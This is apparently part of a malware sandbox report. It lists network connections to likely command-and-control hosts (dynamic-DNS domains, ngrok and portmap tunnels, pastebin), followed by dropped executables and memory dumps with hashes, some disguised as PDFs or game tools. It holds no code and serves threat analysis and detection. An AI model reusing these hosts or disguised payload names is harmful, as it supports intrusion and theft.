| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 72.167.39.236:443 | tcp | |
| US | 8.8.8.8:53 | 236.39.167.72.in-addr.arpa | udp |
| FR | 163.172.125.253:333 | tcp | |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| RU | 185.81.68.147:80 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| RU | 185.81.68.147:80 | tcp | |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 216.58.212.206:443 | docs.google.com | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.204.65:443 | drive.usercontent.google.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 65.204.58.216.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| FR | 90.113.178.145:9033 | tcp | |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| FR | 90.113.178.145:9033 | tcp | |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | clamfluffys.click | udp |
| US | 8.8.8.8:53 | nearycrepso.shop | udp |
| US | 8.8.8.8:53 | abruptyopsn.shop | udp |
| US | 8.8.8.8:53 | wholersorie.shop | udp |
| US | 8.8.8.8:53 | framekgirus.shop | udp |
| US | 8.8.8.8:53 | tirepublicerj.shop | udp |
| US | 8.8.8.8:53 | noisycuttej.shop | udp |
| US | 8.8.8.8:53 | rabidcowse.shop | udp |
| US | 8.8.8.8:53 | cloudewahsj.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 104.21.82.94:443 | yuriy-gagarin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| RU | 176.113.115.215:80 | tcp | |
| FR | 90.113.178.145:9033 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 192.168.50.1:4782 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | cdn.glitch.me | udp |
| IE | 18.66.171.31:80 | cdn.glitch.me | tcp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | 31.171.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bash1.accesscam.org | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 192.188.88.248:2404 | bash1.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.153.198.123:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
Files
memory/5972-2520-0x0000000004230000-0x0000000004266000-memory.dmp
memory/5972-2521-0x0000000004270000-0x00000000042B1000-memory.dmp
memory/5972-2522-0x00000000046F0000-0x00000000047C2000-memory.dmp
memory/2980-2526-0x0000000000860000-0x00000000008F6000-memory.dmp
memory/2980-2528-0x0000000002880000-0x00000000028B6000-memory.dmp
memory/2980-2532-0x000000001B9F0000-0x000000001BB9A000-memory.dmp
memory/2980-2531-0x000000001B7B0000-0x000000001B83C000-memory.dmp
memory/2980-2533-0x000000001BD30000-0x000000001BEB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
| MD5 | 7d9213f8f3cba4035542eff1c9dbb341 |
| SHA1 | 5e6254ebcf8ea518716c6090658b89960f425ab3 |
| SHA256 | 1f74ed6e61880d19e53cde5b0d67a0507bfda0be661860300dcb0f20ea9a45f4 |
| SHA512 | c11d3de160a0b8fdfea390a65ad34e26a78766ecffe50b25c334a7187577dc32170449c6a041a6c50c89fb34ba4f28dfd59e41b93afa8ec2bafc820786b21f94 |
memory/2980-2555-0x0000000002860000-0x0000000002878000-memory.dmp
C:\Config.Msi\e581d29.rbs
| MD5 | 5e1ec6d4a534348a2700f80a6bcf866b |
| SHA1 | 0b239720916a569ec7d5ceb2fd43cc12c689ec1a |
| SHA256 | ebd2d4cd8556e6e9b3f906c5e21c64829f0795fa6e535fecdefa3345baba6888 |
| SHA512 | 0582376917524e4f68ea4dc566a945ba672b89627aa0f606dc6e06ebe4dd161a7ebe87a77dc1d758cb3381e71a76ef6f9a80d96c11ff1722686f288361ad53ad |
memory/2980-2556-0x000000001B3D0000-0x000000001B3E8000-memory.dmp
memory/5672-2568-0x000002891FD20000-0x000002891FD5C000-memory.dmp
memory/5672-2569-0x000002891FD70000-0x000002891FD80000-memory.dmp
memory/5672-2567-0x000002891F880000-0x000002891F986000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\mod.exe
| MD5 | e9987ac76debe4d7c754f30cec95d618 |
| SHA1 | 7678e6011456d26f579c7dcdd238ff651cfa4edd |
| SHA256 | 56510920355a5531d174cb55ebe86f4b0d85c748d0e15dd78849a29f0f3763d1 |
| SHA512 | 919003b30226a8cc81540f652ae51301641325516a5d9bbba140b293b3b97141fbd9274a2f1e942b75e618f57d6e02799e488b36f2cdcbc35f48cc9cc5594771 |
C:\Users\Admin\AppData\Local\Temp\a\Server.exe
| MD5 | 25443271763910e38d74296d29f48071 |
| SHA1 | 269a7dd9ff1d0076a65630715f5bd4600a33bb0d |
| SHA256 | 3bf2449588aaea6f7b7f984af24bd889ee438bb33d9331f5990ef9b6184695e8 |
| SHA512 | 185d233076e4727bf1471f579e2fb56725e30a1f1d4b1f70c8da03d389f41d879eba3731f6daedb34edb8c073df90ca3c0df19362f7b174c72bd6a1251d67aea |
memory/5672-2579-0x0000028939E50000-0x0000028939E82000-memory.dmp
memory/5672-2578-0x0000028921600000-0x0000028921630000-memory.dmp
memory/5672-2580-0x0000028939EC0000-0x0000028939F70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Client.exe
| MD5 | aad11067aa90b9d96958aae378c45747 |
| SHA1 | 13dc757a06a092ab0ef34482c307604a67fd74b9 |
| SHA256 | 2787d416bf228915debc5d9c9e058cc246f8da7217c706d8a1fe0cb788a9155b |
| SHA512 | 8a2fc9cfc72b7f9fb0ff54292022d738013813f222ebe3d7e54f1d916a6307d7652a5f4276d38550e6c515e637358b039a3f784e70a187e2d754b60eaff26813 |
memory/4908-2609-0x0000000000020000-0x0000000000344000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\jij.exe
| MD5 | 170766dd706bef08f2d36bb530ea2ac6 |
| SHA1 | eadac1229aab8aa35b88982010bb3b7af3fd8537 |
| SHA256 | b11ef309a0b65e448d06275293b125714f6a9a796eed61aba45b70eca4ec9176 |
| SHA512 | 9f35ea79804cc478a011c3397a00847c6a93569d7a3913a7674c53b62a516c14bf5aab1250fc68bc310016cb744f0f247f5b1019b5fb9c6388688f5f35e0b187 |
C:\Users\Admin\AppData\Roaming\soniC\logs.dat
| MD5 | eb763045cf5455eda5ef2f75af8a5ad8 |
| SHA1 | d27f89054cddffe226835059655a36c52960075c |
| SHA256 | c1797f5a4b18d7ac3221ee44dd29cbb3df0ef20052caf8a7ef723940859b9796 |
| SHA512 | 40ca5dabc392828193e92d45a44623647fc0a064857876b43d416a22b7ccc8a00f39103c478cf8759e3b7c359d1db214abbbcc26c7cb025c12ef340f430557f9 |
C:\Users\Admin\AppData\Roaming\app
| MD5 | 5014379cf5fa31db8a73d68d6353a145 |
| SHA1 | 2a1a5138e8c9e7547caae1c9fb223afbf714ed00 |
| SHA256 | 538b830838cbf62e6ce267b48e2eb165030686e5b6317f0b1e9205a3e08c73b8 |
| SHA512 | 5091a16ef7730449601a70b5ef5512a93c98c76beb8cfee1adc9d39780c49b1d712e764720b04e44e18c7b08633c5d453793462c18dc6bef14d82bf69892e18f |
C:\Users\Admin\AppData\Local\Temp\a\333.exe
| MD5 | 5855063b0ae049847b1d9eeced51a17b |
| SHA1 | 17cab3ae528d133d8f01bd8ef63b1a92f5cb23da |
| SHA256 | 62f8cfee286a706856ebe02b176db9169ae776c6609c23016868887ea6b0ab98 |
| SHA512 | c24970775e8da3f46763824b22fbccdbd2741836cdc3bd9966ef639db8db28cb1b888875da2babab037df6e26e5774f475f55ba10b6f354504185de4d5f4713f |
memory/2384-2632-0x0000000000D20000-0x0000000000D36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
| MD5 | 6e2e5695aea9df994f972a50e9303216 |
| SHA1 | 12bef7c96f16f96e06cf338e9afa79f3a494d100 |
| SHA256 | b193363a955c7899df2b2a8116c86e6b94ce0eca9b86360afbf35bbfac9fe7fa |
| SHA512 | acc6e95f4bb345481a098b4f53bc7a93ad67ef3ed58b34dd3dcdc03f24b1453e802c5acd573840f90d619c74314c1465eeb1ba2845fc3722c04051ed99583278 |
C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe
| MD5 | 6e3dc1be717861da3cd7c57e8a1e3911 |
| SHA1 | 767e39aa9f02592d4234f38a21ea9a0e5aa66c62 |
| SHA256 | d4a388cc151fa56379f9ac6ef8b7851b6750c2ecfc2c8f6904ac6002865c4f30 |
| SHA512 | da91742e1494c027616e114e42d3333d61eda91379f6ad2ba415dc39e0b5165a25498d60537b3cb12a49267c306dfbec87d3af528e27abc9946cd5fda6b129c1 |
C:\Users\Admin\AppData\Local\Temp\melt.txt
| MD5 | 298802dff6aa26d4fb941c7ccf5c0849 |
| SHA1 | 11e518ca3409f1863ebc2d3f1be9fb701bad52c0 |
| SHA256 | df99fdbdf7b92b29b1bf1ca4283b4de2e04643b9739d2d1089ab5808e8e5665d |
| SHA512 | 0301017dfef1b74855d6535f3fd542257689479cb933c2e8742b5b6b94e26107fa38e7fc21bdb83d45184750eced344856092330fb30a1ebbc24b2b9004c8946 |
C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
| MD5 | d4a776ea55e24d3124a6e0759fb0ac44 |
| SHA1 | f5932d234baccc992ca910ff12044e8965229852 |
| SHA256 | 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c |
| SHA512 | ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b |
memory/4468-3128-0x00000000003F0000-0x0000000000714000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
| MD5 | 5da0a355dcd44b29fdd27a5eba904d8d |
| SHA1 | 1099e489937a644376653ab4b5921da9527f50a9 |
| SHA256 | e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f |
| SHA512 | 289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6 |
memory/6136-3179-0x00000000008E0000-0x0000000000C04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
| MD5 | 036ba72c9c4cf36bda1dc440d537af3c |
| SHA1 | 3c10ef9932ffc206a586fe5768879bf078e9ebeb |
| SHA256 | bb41ae95f911a55ab1101ca7854918ec0f23548376d4846a2176b9c289102114 |
| SHA512 | c7e8c37787b759bca7fb6d02692c0263d6c60f606ee52e890f3c177dabd00ac6305cd43056164f6e16fbc18046a8c4226172f295ebc85e310ea7e52878d5137d |
memory/6660-3196-0x0000000000430000-0x0000000000450000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
| MD5 | 9d347d5ac998a89f78ba00e74b951f55 |
| SHA1 | 73df3d5c8388a4d6693cbb24f719dba8833c9157 |
| SHA256 | 2ea5686422bd8fb6eda542e9a96588f9deb1c97c45f3cb7d3b21ac4da540b57c |
| SHA512 | 3db7421aa98e8e108bf982048dda7e0f09428c6498cf5f9f56ef499fb2fafc5deabde8ecb99e1fdd570d54ae9c0533b7502de5848c9e772708cf75509d0c9d9e |
memory/4072-3214-0x0000000000C90000-0x0000000000CA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
| MD5 | 4e7b96fe3160ff171e8e334c66c3205c |
| SHA1 | ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f |
| SHA256 | e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c |
| SHA512 | 2e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48 |
memory/2936-3225-0x0000000000480000-0x0000000000506000-memory.dmp
memory/2936-3237-0x0000000005C30000-0x0000000005C42000-memory.dmp